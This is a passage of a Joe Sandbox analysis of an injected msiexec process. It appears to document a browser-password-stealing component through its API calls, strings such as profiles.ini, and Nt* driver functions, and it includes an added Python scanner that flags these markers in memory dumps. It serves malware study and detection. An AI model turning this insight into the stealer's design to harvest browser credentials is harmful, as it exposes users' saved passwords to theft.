                                                                                            • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                            • String ID: :stringdata$ftp://$http://$https://
                                                                                            • API String ID: 2787044678-1921111777
                                                                                            • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                            • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                            • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                            • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                            • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                            • GetDC.USER32 ref: 004140E3
                                                                                            • wcslen.MSVCRT ref: 00414123
                                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                            • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                            • _snwprintf.MSVCRT ref: 00414244
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                            • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                            • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                            • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                            • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                            • String ID: %s:$EDIT$STATIC
                                                                                            • API String ID: 2080319088-3046471546
                                                                                            • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                            • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                            • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                            • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                            APIs
                                                                                            • EndDialog.USER32(?,?), ref: 00413221
                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                            • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                            • memset.MSVCRT ref: 00413292
                                                                                            • memset.MSVCRT ref: 004132B4
                                                                                            • memset.MSVCRT ref: 004132CD
                                                                                            • memset.MSVCRT ref: 004132E1
                                                                                            • memset.MSVCRT ref: 004132FB
                                                                                            • memset.MSVCRT ref: 00413310
                                                                                            • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                            • memset.MSVCRT ref: 004133C0
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                            • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                            • wcscpy.MSVCRT ref: 0041341F
                                                                                            • _snwprintf.MSVCRT ref: 0041348E
                                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                            • SetFocus.USER32(00000000), ref: 004134B7
                                                                                            Strings
                                                                                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                            • {Unknown}, xrefs: 004132A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                            • API String ID: 4111938811-1819279800
                                                                                            • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                            • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                            • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                            • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
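The string markers the report lists for this memory region (the "Exception %8.8X at address ..." crash-dialog text above, "OsError 0x%x (%u)", "com.apple.Safari" / "com.apple.WebKit2WebProcess", "profiles.ini" and ":stringdata") are what the embedded browser-password recovery component is identified by. The following scanner is an added example for triaging a raw dump of the injected msiexec image; it is not part of the Joe Sandbox report or of the sample. The report does not say whether each string is stored as ANSI or UTF-16LE, so both encodings are searched, and the dump bytes are constructed test data.

```python
"""Added example: locate the string markers the report attributes to the
injected payload in a raw process-memory dump. Not code from the report
or the sample; the dump below is constructed."""
import re
from typing import Dict, List, Tuple

# Markers taken from the String IDs in the report. Names on the left are
# labels chosen for this example.
MARKERS = {
    "nirsoft_crash_dialog": "Exception %8.8X at address %8.8X in module %s",
    "oserror_format": "OsError 0x%x (%u)",
    "safari_bundle_id": "com.apple.Safari",
    "webkit2_process": "com.apple.WebKit2WebProcess",
    "firefox_profiles_ini": "profiles.ini",
    "stringdata_tag": ":stringdata",
}


def _patterns() -> List[Tuple[str, str, "re.Pattern[bytes]"]]:
    """Compile each marker as both an ANSI and a UTF-16LE byte pattern.
    Assumption: encoding is unknown, so both are tried."""
    pats = []
    for name, text in MARKERS.items():
        pats.append((name, "ansi", re.compile(re.escape(text.encode("ascii")))))
        pats.append((name, "utf16le", re.compile(re.escape(text.encode("utf-16-le")))))
    return pats


def scan_markers(buf: bytes) -> Dict[str, List[Tuple[int, str]]]:
    """Return {marker_name: [(offset, encoding), ...]} for every hit in buf."""
    hits: Dict[str, List[Tuple[int, str]]] = {}
    for name, enc, pat in _patterns():
        for m in pat.finditer(buf):
            hits.setdefault(name, []).append((m.start(), enc))
    return hits


def looks_like_browser_passview(buf: bytes, min_markers: int = 3) -> bool:
    """Heuristic verdict: at least min_markers distinct markers present.
    The threshold is an assumption for this example, not a report value."""
    return len(scan_markers(buf)) >= min_markers


# Constructed dump: padding plus a mix of UTF-16LE and ANSI markers.
SAMPLE_DUMP = (
    b"\x00" * 64
    + "Exception %8.8X at address %8.8X in module %s".encode("utf-16-le")  # 90 bytes
    + b"\x00" * 32
    + b"profiles.ini\x00"
    + b"\x90" * 16
    + "com.apple.Safari".encode("utf-16-le")
    + b"\x00" * 8
    + b"OsError 0x%x (%u)\x00"
)

if __name__ == "__main__":
    for name, where in sorted(scan_markers(SAMPLE_DUMP).items()):
        print(name, where)
    print("verdict:", looks_like_browser_passview(SAMPLE_DUMP))
```

Run it against a dump such as the `0000000A.00000002...00400000...sdmp` region named in the report to confirm which markers survive in memory; offsets are relative to the dump start, so add the region base (0x400000 here) to compare with the `ref:` addresses above.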
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                            • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                            • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                            • EndDialog.USER32(?,?), ref: 0040135E
                                                                                            • DeleteObject.GDI32(?), ref: 0040136A
                                                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                            • ShowWindow.USER32(00000000), ref: 00401398
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                            • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                            • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                            • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                            • String ID:
                                                                                            • API String ID: 829165378-0
                                                                                            • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                            • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                            • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                            • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00404172
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            • wcscpy.MSVCRT ref: 004041D6
                                                                                            • wcscpy.MSVCRT ref: 004041E7
                                                                                            • memset.MSVCRT ref: 00404200
                                                                                            • memset.MSVCRT ref: 00404215
                                                                                            • _snwprintf.MSVCRT ref: 0040422F
                                                                                            • wcscpy.MSVCRT ref: 00404242
                                                                                            • memset.MSVCRT ref: 0040426E
                                                                                            • memset.MSVCRT ref: 004042CD
                                                                                            • memset.MSVCRT ref: 004042E2
• _snwprintf.MSVCRT ref: 004042FE
• wcscpy.MSVCRT ref: 00404311
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
• String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
• API String ID: 2454223109-1580313836
• Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
• Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
• Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
• Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA

APIs
  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
• SetMenu.USER32(?,00000000), ref: 00411453
• SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
• GetModuleHandleW.KERNEL32(00000000), ref: 00411495
• LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
• GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
• CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
• memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
• ShowWindow.USER32(?,?), ref: 004115FE
• GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
• GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
• RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
• SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
• SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
• String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
• API String ID: 4054529287-3175352466
• Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
• Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
• Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
• Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: wcscat$_snwprintfmemset$wcscpy
• String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
• API String ID: 3143752011-1996832678
• Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
• Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
• Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
• Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D

APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
• GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
• GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
• GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
• GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
• GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
• GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
• GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
• GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
• API String ID: 667068680-2887671607
• Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
• Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
• Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
• Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: _snwprintfmemset$wcscpy$wcscat
• String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
• API String ID: 1607361635-601624466
• Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
• Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
• Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
• Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: _snwprintf$memset$wcscpy
• String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
• API String ID: 2000436516-3842416460
• Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
• Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
• Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
• Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66

APIs
  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
• GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
• LoadIconW.USER32(00000000,00000072), ref: 004035CA
• GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
• LoadIconW.USER32(00000000,00000074), ref: 004035E4
• GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
• LoadIconW.USER32(00000000,00000073), ref: 004035F8
• GetModuleHandleW.KERNEL32(00000000), ref: 00403607
• LoadIconW.USER32(00000000,00000075), ref: 0040360C
• GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
• LoadIconW.USER32(00000000,0000006F), ref: 00403620
• GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
• LoadIconW.USER32(00000000,00000076), ref: 00403634
• GetModuleHandleW.KERNEL32(00000000), ref: 00403643
• LoadIconW.USER32(00000000,00000077), ref: 00403648
• GetModuleHandleW.KERNEL32(00000000), ref: 00403657
• LoadIconW.USER32(00000000,00000070), ref: 0040365C
• GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
• LoadIconW.USER32(00000000,00000078), ref: 00403670
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 1043902810-0
• Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
• Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
• Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
• Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929

APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
• free.MSVCRT ref: 0040E49A
  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
• memset.MSVCRT ref: 0040E380
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
• wcschr.MSVCRT ref: 0040E3B8
• memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
• memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E407
• memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E422
• memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E43D
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
• String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
• API String ID: 3849927982-2252543386
• Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
• Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
• Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
• Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

APIs
• ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
• _snwprintf.MSVCRT ref: 0044488A
• wcscpy.MSVCRT ref: 004448B4
• ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@??3@_snwprintfwcscpy
• String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
• API String ID: 2899246560-1542517562
• Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
• Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
• Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
• Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8

APIs
• memset.MSVCRT ref: 0040DBCD
• memset.MSVCRT ref: 0040DBE9
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
  • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
  • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
  • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
• wcscpy.MSVCRT ref: 0040DC2D
• wcscpy.MSVCRT ref: 0040DC3C
• wcscpy.MSVCRT ref: 0040DC4C
• EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
• EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
• wcscpy.MSVCRT ref: 0040DCC3
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
Similarity
• API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
• String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
• API String ID: 3330709923-517860148
• Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
• Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
• Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
• Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                            APIs
                                                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                            • memset.MSVCRT ref: 0040806A
                                                                                            • memset.MSVCRT ref: 0040807F
                                                                                            • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                            • _wcsicmp.MSVCRT ref: 004081C3
                                                                                            • memset.MSVCRT ref: 004081E4
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
